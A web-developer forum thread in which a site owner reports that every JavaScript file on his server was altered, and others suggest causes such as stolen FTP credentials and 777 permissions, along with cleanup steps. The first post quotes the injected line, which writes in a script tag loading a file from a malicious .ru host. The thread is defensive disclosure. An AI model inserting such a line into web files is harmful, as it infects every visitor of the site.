SitePoint Sponsor

User Tag List

Results 1 to 8 of 8
  1. #1
    SitePoint Addict Latox's Avatar
    Join Date
    Dec 2008
    Location
    Australia
    Posts
    389
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Attention: Javascript Hack Going Around

    There is currently somebody, somewhere going around to websites/servers and editing their .js files.

    I was on my website today and saw "greatrow.ru" loading... I was like what the hell?

    So I opened httpfox, and saw a .js file loading into my site.

    Image: http://www.freemoviedb.com/imgs/greatrow_example.jpg

    I checked my source code, nothing had been changed.

    I checked my javascript files, ALL of the javascript files on the account had been edited at the same time, and this line had been placed at the bottom of each .js file:

    Code JavaScript:
    document.write('<sc'+'ript type="text/javascript"
    src="http://greatrow.ru/Unfriend.js"></scri'+'pt>');

    I then checked the other sites on my server, EVERY site on my server, EVERY javascript file on my server had this piece of code inserted at the bottom.

    The greatrow.ru site scans as a virus/malicious - so be careful, check your site - check your .js files.

    I didn't download anything nor give anyone access and every .js file was edited?

    Heads up!

    I'd like to hear some feedback on this also, as I'm not really knowledgeable when it comes to web security, hacking, etc.

    I'd also like to hear if it has happened to you.
    :-)

  2. #2
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    When performing website forensics, always look for the common denominator first.

    Is it your dedicated server?

    If so, who has FTP access to the root of the websites?

    What website software does each website have? Wordpress? Joomla? osCommerce? ZenCart? All of these have been recent targets (as they are all the time). Be certain all your software is updated and the plugins too.

    Do you have the FTP logs? What about the access logs?

    Provide more details and I can help you solve the problem of "how"?

  3. #3
    Non-Member
    Join Date
    Sep 2010
    Posts
    40
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Happened to me aswell.
    But it was greatrow.ru/Web_host.js
    Noone should have access to my ftp-account, but its webspace, maybe the server got hacked and a program added this line to each .js on the whole webserver?
    I don't run any CMS or something, only like 5 PHP scripts which access to the mysql database and a single javascript file.
    Last edited by biggybiggysmally; Oct 3, 2010 at 11:57. Reason: please don't post links to mal sites

  4. #4
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You're correct - nobody "should" have access to your FTP but when you rule out the vulnerabilities of CMS's it sounds an awful lot like compromised FTP credentials.

    They it typically happens is this; because there are so many viruses running around the Internet, many of today's best anti-virus products can't stop them all. Sometimes, a virus slips through the best defenses. These viruses look for the file containing the FTP credentials, reads the info, sends it to a server which then infects the website(s) it now has legitimate credentials for.

    First, I would suggest you change all FTP passwords - immediately.

    Second, scan all PCs for viruses. Make sure you do a full scan. Too many times we discover that people don't set their anti-virus programs to do full system scans. So, if a virus was released on Monday and your anti-virus program didn't get the signature until Tuesday, without doing a full system scan, your anti-virus program would never know it's there.

    Then, remove the infection from all your .js files and look at all .php files for any unnecessary base64_decode strings.

    Post back here with any other questions you have.

  5. #5
    Non-Member
    Join Date
    Sep 2010
    Posts
    40
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    There is no file containing the ftp credentials.
    Of course, I already removed the "infections".
    Website runs on a shared host. If the host gets hacked, I can't do anything against it.

  6. #6
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    What FTP software are you using?

  7. #7
    secure webapps for all Aleksejs's Avatar
    Join Date
    Apr 2008
    Location
    Riga, Latvia
    Posts
    755
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    First of all - ask your hosting provider, that they offer something more secure than FTP. SFTP or FTPS So that at least your password is not sent unencrypted.

  8. #8
    SitePoint Enthusiast
    Join Date
    Nov 2009
    Posts
    37
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by biggybiggysmally View Post
    Happened to me aswell.
    But it was greatrow.ru/Web_host.js
    Noone should have access to my ftp-account, but its webspace, maybe the server got hacked and a program added this line to each .js on the whole webserver?
    I don't run any CMS or something, only like 5 PHP scripts which access to the mysql database and a single javascript file.
    Often other users accounts on shared hosting can access your files if the file permissions are set to 777. Its then a simple matter using the compromised account to scan for writable files (html, php, js) and add the javascript to every writable file it finds on the server.
    phpSiteMinder - website backup and file integrity monitoring.
    Been hacked? phpSiteScanner can help you clean your site up.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •